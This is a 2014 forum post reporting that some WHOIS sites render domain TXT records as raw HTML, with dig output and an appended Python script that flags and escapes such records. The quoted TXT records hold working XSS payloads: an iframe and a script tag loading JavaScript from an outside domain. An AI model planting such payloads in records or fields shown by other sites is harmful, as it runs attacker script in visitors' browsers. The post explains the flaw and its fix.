
XSS vulnerability in some WHOIS providers... via TXT records

Posted: Thu Sep 18, 2014 11:05 am
by Zancarius
That's right, XSS vulnerabilities are present in some WHOIS providers. All you have to do is put something in the TXT record of a domain you control, and anyone who visits the appropriately affected site gets Rick-Rolled.

(XSS = Cross-site Scripting vulnerability.)

Here's what the onerous TXT record appears to be as of this writing:

Code:
[gridlock:~]$ dig txt jamiehankins.co.uk

; <<>> DiG 9.9.2-P2 <<>> txt jamiehankins.co.uk
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22275
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 2, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;jamiehankins.co.uk.            IN      TXT

;; ANSWER SECTION:
jamiehankins.co.uk.     300     IN      TXT     "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>"
jamiehankins.co.uk.     300     IN      TXT     "v=spf1 include:spf.mandrillapp.com ?all"
jamiehankins.co.uk.     300     IN      TXT     "google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI"
jamiehankins.co.uk.     300     IN      TXT     "<script src='//peniscorp.com/topkek.js'></script>"

;; AUTHORITY SECTION:
jamiehankins.co.uk.     172800  IN      NS      hank.ns.cloudflare.com.
jamiehankins.co.uk.     172800  IN      NS      lucy.ns.cloudflare.com.

;; ADDITIONAL SECTION:
hank.ns.cloudflare.com. 12161   IN      A       173.245.59.116
hank.ns.cloudflare.com. 12161   IN      AAAA    2400:cb00:2049:1::adf5:3b74
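As an added example (my own code, not from the original post or any WHOIS provider), here is the defender's view of the bug above: a small Python script that parses the TXT lines of the dig ANSWER section, shows the HTML a WHOIS page produces when it drops the raw strings into its markup next to the HTML-escaped form that neutralises them, and flags records that contain tag-like content so an operator can spot them before they reach a page. Function names and the sample input are my own; the sample is copied from the dig output above.

```python
import html
import re

# Constructed sample: the four TXT answers from the dig output above.
DIG_ANSWER = """\
jamiehankins.co.uk.     300     IN      TXT     "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>"
jamiehankins.co.uk.     300     IN      TXT     "v=spf1 include:spf.mandrillapp.com ?all"
jamiehankins.co.uk.     300     IN      TXT     "google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI"
jamiehankins.co.uk.     300     IN      TXT     "<script src='//peniscorp.com/topkek.js'></script>"
"""

# One dig answer line: owner, TTL, class, type, then a single quoted string.
# (Real TXT records can carry several quoted strings; the sample uses one.)
TXT_LINE = re.compile(r'^(\S+)\s+(\d+)\s+IN\s+TXT\s+"(.*)"$')

# Anything that looks like the start of an HTML tag: '<', optional '/', a letter.
MARKUP_RE = re.compile(r"<\s*/?[A-Za-z]")


def parse_txt_records(dig_output):
    """Return the TXT string of every matching answer line, in order."""
    records = []
    for line in dig_output.splitlines():
        m = TXT_LINE.match(line.strip())
        if m:
            records.append(m.group(3))
    return records


def looks_like_markup(record):
    """True if a TXT string contains something that would parse as an HTML tag."""
    return bool(MARKUP_RE.search(record))


def render_txt_html(records, escape=True):
    """Build the <ul> a lookup page might show. escape=False reproduces the
    vulnerable behaviour: TXT content lands in the page as live markup.
    escape=True is the fix: html.escape turns < > & ' " into entities."""
    items = []
    for r in records:
        text = html.escape(r, quote=True) if escape else r
        items.append(f"<li>{text}</li>")
    return "<ul>\n" + "\n".join(items) + "\n</ul>"


if __name__ == "__main__":
    recs = parse_txt_records(DIG_ANSWER)
    for r in recs:
        print(("MARKUP  " if looks_like_markup(r) else "plain   ") + r[:60])
    print(render_txt_html(recs))  # escaped: tags appear as text, not as elements
```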